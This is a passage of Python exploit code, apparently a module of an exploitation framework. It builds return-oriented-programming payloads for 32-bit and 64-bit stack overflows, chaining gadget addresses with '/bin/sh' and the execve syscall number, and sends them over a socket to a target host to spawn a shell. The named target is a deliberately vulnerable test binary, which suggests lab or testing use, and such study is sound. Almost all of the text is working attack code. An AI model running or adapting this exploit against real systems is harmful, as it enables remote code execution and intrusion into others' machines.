libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
#pop_ret5_addr =pop_ret4_addr - 2
#set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(
binsh_addr) + p32(pop_ret2_addr) + p32(pop_ret3_addr) + p32(
self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(
self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {
'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, #execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
#set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(
binsh_addr) + p64(pop_ret2_addr) + p64(pop_ret3_addr) + p64(
self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(
self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
